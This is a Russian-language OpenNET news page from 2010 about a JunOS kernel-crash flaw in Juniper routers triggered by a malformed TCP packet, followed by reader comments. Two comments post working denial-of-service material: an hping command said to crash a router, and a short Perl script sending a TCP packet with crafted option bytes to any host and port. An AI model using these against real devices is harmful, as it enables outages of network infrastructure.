The OpenNET Project
 
Поиск (ключи):    ПРОГРАММЫ СТАТЬИ СОВЕТЫ ФОРУМ
  WIKI НОВОСТИ (+) MAN'ы ДОКУМЕНТАЦИЯ

08.01.2010 20:48  Уязвимость в маршрутизаторах Juniper, приводящая к краху ядра JunOS

Компания Juniper Networks объявила об обнаружении уязвимости в ядре операционной системы JunOS, под которой работают большинство маршрутизаторов Juniper. Посылка специально сформированного TCP пакета (с неправильно оформленной заглавной частью) на открытый порт самого маршрутизатора вызывает крах ядра, ведущий за собой рестарт устройства. Встроенный межсетевой экран не в состоянии "поймать" и изолировать такой пакет.

Проблеме подвержены почти все версии JunOS, начиная с 5.3.5 p0-2 и заканчивая 9.0R1.1 (полный список приводится здесь). По словам Juniper Networks, проблема обнаружена самой компанией во время проверки на совместимость с оборудованием других производителей. Подробностей по поводу того каким образом должен быть сформирован пакет не сообщается. По неофициальным данным, обновление будет доступно в понедельник, 11 января.

Ссылки к новости:
  1. Главная ссылка к новости (http://praetorianprefect.com/archives/20...)
Автор новости: Mr. Mistoffelees
Тип: Проблемы безопасности
Ключевые слова: Juniper, security, (найти похожие документы)
При перепечатке указание ссылки на opennet.ru обязательно
Реклама
Обсуждение Ajax режим | Показать все | RSS
 
  • 1.1, Аноним, 22:40, 08/01/2010 [ответить] [смотреть все]
  • +/
    С учетом того, что в JunOS используется код FreeBSD, нет ли подобной дыры в друг... весь текст скрыт [показать]
     
     
  • 2.2, Hety, 22:53, 08/01/2010 [ответить] [смотреть все] [показать ветку]  
  • +/
    Фряшный код используется не во всех подсистемах Деталей не помню, но есть вероя... весь текст скрыт [показать] [показать ветку]
     
  • 1.3, chemtech, 10:54, 09/01/2010 [ответить] [смотреть все]  
  • +/
    Была бы свободная прошивка, накатил патч, а тут ждать когда они обновят прошивку и не факт что еще все дыры залатали...
     
     
  • 2.5, Lindemidux, 15:52, 09/01/2010 [ответить] [смотреть все] [показать ветку]  
  • +/
    У d-link свободная прошивка, попробуй накатай патч ... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.6, User294, 16:40, 09/01/2010 [ответить] [смотреть все]  
  • –2 +/
    У меня именно таким манером в свое время был Д-линк с прошивкой от сторонних... весь текст скрыт [показать]
     
     
  • 4.10, arachnid, 22:13, 09/01/2010 [ответить] [смотреть все]  
  • –2 +/
    осподи, опять крышу снесло от букв bsd ps а что делать, если не будет очередн... весь текст скрыт [показать]
     
     
  • 5.11, vitek, 00:37, 10/01/2010 [ответить] [смотреть все]  
  • +/
    а его уже как полтора года нет нашлись другие - http code google com p wl500g... весь текст скрыт [показать]
     
     
  • 6.13, arachnid, 15:54, 10/01/2010 [ответить] [смотреть все]  
  • +/
    идешь на сайт интела и берешь прошивку все просто правда энтузиастам пока поче... весь текст скрыт [показать]
     
     
  • 7.16, User294, 20:55, 10/01/2010 [ответить] [смотреть все]  
  • +/
    А в чем было поливание говном Я констатировал факт что при наличии сорсов тупые... весь текст скрыт [показать]
     
  • 7.29, boykov, 17:57, 18/01/2010 [ответить] [смотреть все]  
  • +/
    а оно надо этому девайсу с вайфаем -- была острая необходимость здесь то что ... весь текст скрыт [показать]
     
     
  • 8.32, arachnid, 08:19, 19/01/2010 [ответить] [смотреть все]  
  • +/
    а здесь - потрясающе низкая скорость работы сетевого накопителя ... весь текст скрыт [показать]
     
  • 5.14, User294, 20:42, 10/01/2010 [ответить] [смотреть все]  
  • +/
    Я осваиваю OpenWRT и связанные с ним околосистемные дела Весьма осмысленная так... весь текст скрыт [показать]
     
     
  • 6.18, arachnid, 21:52, 10/01/2010 [ответить] [смотреть все]  
  • +/
    Ну да, бздунам с их всеобщим счастьем для закрывателей сорсов такое ессно не св... весь текст скрыт [показать]
     
     
  • 7.19, User294, 22:28, 10/01/2010 [ответить] [смотреть все]  
  • +/
    Да, кой-в чем вы правы надо стараться избегать таких оборотов провоцирующих на ... весь текст скрыт [показать]
     
     
  • 8.20, arachnid, 23:30, 10/01/2010 [ответить] [смотреть все]  
  • +/
    ну я бы сказал, что подобная реакция заслуженна определенным поведением, разве н... весь текст скрыт [показать]
     
     
  • 9.30, User294, 18:30, 18/01/2010 [ответить] [смотреть все]  
  • +/
    Как Да, вот только для длинков и асусов всяких, с их GPL - желающие сами могут ... весь текст скрыт [показать]
     
     
  • 10.33, arachnid, 08:38, 19/01/2010 [ответить] [смотреть все]  
  • +/
    как заслуженна еще раз отрывок из коммента выше напомнить то устройство, н... весь текст скрыт [показать]
     
  • 6.22, Юрий, 05:22, 11/01/2010 [ответить] [смотреть все]  
  • +/
    Так покопайтесь с Time Capsule - внутри 100 Marvell ... весь текст скрыт [показать]
     
     
  • 7.31, User294, 18:42, 18/01/2010 [ответить] [смотреть все]  
  • +/
    Это чего-то яббловское как я понял От продукции яббла я предпочитаю держаться п... весь текст скрыт [показать]
     
  • 4.28, анон, 08:29, 15/01/2010 [ответить] [смотреть все]  
  • +1 +/
    йо ваше маниакальное стремление пересадить всех на опенсорц напоминает РМС хот... весь текст скрыт [показать]
     
  • 3.8, Ъ, 19:58, 09/01/2010 [ответить] [смотреть все]  
  • +/
    В каком месте ftp dlink ru pub как-то не на что не наблюдается ... весь текст скрыт [показать]
     
     
  • 4.15, User294, 20:45, 10/01/2010 [ответить] [смотреть все]  
  • +/
    А в ftp dlink ru pub ADSL GPL_source_code интересно чего А так - да, неко... весь текст скрыт [показать]
     
     ....нить скрыта, показать (19)

  • 1.4, cvsup, 13:56, 09/01/2010 [ответить] [смотреть все]  
  • +2 +/
    Видео:
    http://praetorianprefect.com/archives/2010/01/junos-juniper-kernel-crash-vide
     
  • 1.7, аноним, 19:02, 09/01/2010 [ответить] [смотреть все]  
  • +/
    да. Ынтерпрайз баги, классика... классика, конечно, пинг смерти, но и это сойдёт
     
  • 1.9, XoRe, 21:53, 09/01/2010 [ответить] [смотреть все]  
  • +/
    >Подробностей по поводу того каким образом должен быть сформирован пакет
    >не сообщается.

    Можно попробовать подойти к вопросу с точки зрения комбинаторики.
    Нагенерить 2 в степени n пакетов и поотсылать их устройству.
    На каком пакете упадет, тот левый)

     
     
  • 2.17, User294, 21:03, 10/01/2010 [ответить] [смотреть все] [показать ветку]  
  • +/
    А чему равно n? А то скажем 2^128 пакетоы вы обломитесь послать пожалуй :)
     
  • 1.12, vgray, 10:38, 10/01/2010 [ответить] [смотреть все]  
  • +/
    посмотрел видео, попробовал. там в описании ошибка небольшая. но все работает
    hping -c 1 -p 23 -L 0 -M 0 192.168.10.210 -S -E ./jun/1012 -d 10 -O 7
    убивает 9й джун наповал.


                          

     
  • 1.21, Аноним, 04:23, 11/01/2010 [ответить] [смотреть все]  
  • +/
    А можно содержимое файлика jun 1012 Всё равно 23-й порт закрыт от обычных поль... весь текст скрыт [показать]
     
     
  • 2.23, vgray, 05:34, 11/01/2010 [ответить] [смотреть все] [показать ветку]  
  • +/
    >А можно содержимое файлика /jun/1012. Всё равно 23-й порт закрыт от обычных
    >пользователей.

    увы не скажу, так как даже если порт закрыт ACL то все равно джунипер валится. Попробуйте почитать исходную новость и попробовать самим подобрать содержимое файла

     
  • 1.24, Аноним, 07:11, 11/01/2010 [ответить] [смотреть все]  
  • +/
    Ясно Тогда я не оценил масштабов трагедии ... весь текст скрыт [показать]
     
  • 1.25, Аноним, 08:55, 11/01/2010 [ответить] [смотреть все]  
  • +/
    Если не сложно можно связаться с Вами для уточнения содержимого пакета, так как ... весь текст скрыт [показать]
     
  • 1.27, luzers, 14:27, 11/01/2010 [ответить] [смотреть все]  
  • +1 +/
    #!/usr/bin/perl

    my $host = shift;
    my $port = shift;

    use Net::Packet qw($Env);

    use Net::Packet::IPv4;
    my $ip = Net::Packet::IPv4->new(dst => $host);

    use Net::Packet::TCP;

    my $tcp = Net::Packet::TCP->new(
    dst => $port,
    options => "\x65\x02\x01\x01",
    );

    use Net::Packet::Frame;
    my $frame = Net::Packet::Frame->new(l3 => $ip, l4 => $tcp);

    $frame->send;
    exit 0;

     

    Ваш комментарий
    Имя:
    E-Mail:
    Заголовок:
    Текст:
     
    Навигация
     
     Новости для экспорта XML  twitter  
     Сводные | за день | мини-новости
     Разделы новостей
     Что нового на OpenNet
     Поиск в новостях
     Добавить свою новость

    Важное
    - 27.08 Смена лицензии на код RPC решила проблемы со свободностью кода NFS и Glibc (30 +16)
    - 26.08 Снято ограничение на время бесплатного использования H.264 в online-сервисах (29 –6)
    - 25.08 Вышел видеодрайвер ATI Catalyst 10.8 с поддержкой OpenGL ES 2.0 (13 +5)
    - 25.08 Linux празднует 19 лет (31 +20)
    - 20.08 Представлен SeedKit, проект для создания GNOME-приложений на базе web-технологий (38 +7)
    - 19.08 Статьи за неделю не попавшие в ленту новостей (выпуск 133)
    - 18.08 В Ubuntu Linux прекращена поддержка архитектур SPARC и IA64 (12 +2)
    - 18.08 Обнаружена локальная root-уязвимость, затрагивающая все Linux-ядра 2.6.x (89 +20)

    Советы
    - 31.08 Подключение LVM-разделов под FreeBSD
    - 30.08 Как удержать SSH-соединение от обрыва при использовании Socks
    - 25.08 Пропуск выполнения e2fsck при загрузке, через нажатие CTRL-C
    - 24.08 Выявление NAT-устройства в сети
    - 23.08 Блокирование Skype соединений на прокси-сервере Squid

    Обсуждаемые новости
    - 23:39 Началось тестирование файловой системы ZFS v28 для FreeBSD (87)
    - 23:38 На создателей модифицированной прошивки подан иск, связанный (66)
    - 23:33 Valve, вероятно, продолжает работать над портированием своих (2)
    - 23:24 Релиз Spice 0.6, системы для организации доступа к виртуализ (19)
    - 23:17 В последней тестовой сборке OpenOffice.org осуществлен перех (5)
    - 23:14 В Fedora Linux обеспечена поддержка обновления ядра без пере (49)
    - 23:06 Суд отказал в удовлетворении иска, связанного с блокирование (28)
    - 22:58 Корректирующий релиз KDE SC 4.5.1 (52)

    Закажите подписки на Mandriva Enterprise Server 5 и Mandriva 2010 Powerpack

    Подписки на Mandriva Enterprise Server 5 и Mandriva 2010 Powerpack включают получение обновлений и технической поддержки.

    Техническая поддержка оказывается на русском языке по телефону, электронной почте и через web-форму. Предлагается подписка трех уровней - "Базовый", "Стандартный", "VIP", отличающихся скоростью реакции службы технической поддержки на проблему заказчика.

    Mandriva Enterprise Server 5 (MES 5) - это надежный и производительный дистрибутив GNU/Linux для корпоративного сервера. В MES 5 интегрированы серверные разработки программистов Mandriva, а также ведущие свободные серверные приложения, которые помогут настроить и поддерживать необходимые вам серверы.

    Mandriva 2010 Powerpack - это идеальный вариант для перехода на Linux новых пользователей в офисе и дома. В то же время, Mandriva 2010 Powerpack полностью удовлетворяет запросы опытных пользователей и администраторов.

    Более подробно познакомиться с подписками вы можете здесь: http://www.linuxcenter.ru/shop/licence/mandriva/


      Закладки на сайте
      Проследить за страницей
    Created 1996-2010 by Maxim Chirkov  
    ДобавитьРекламаВебмастеруГИД  
    RUNNet TopList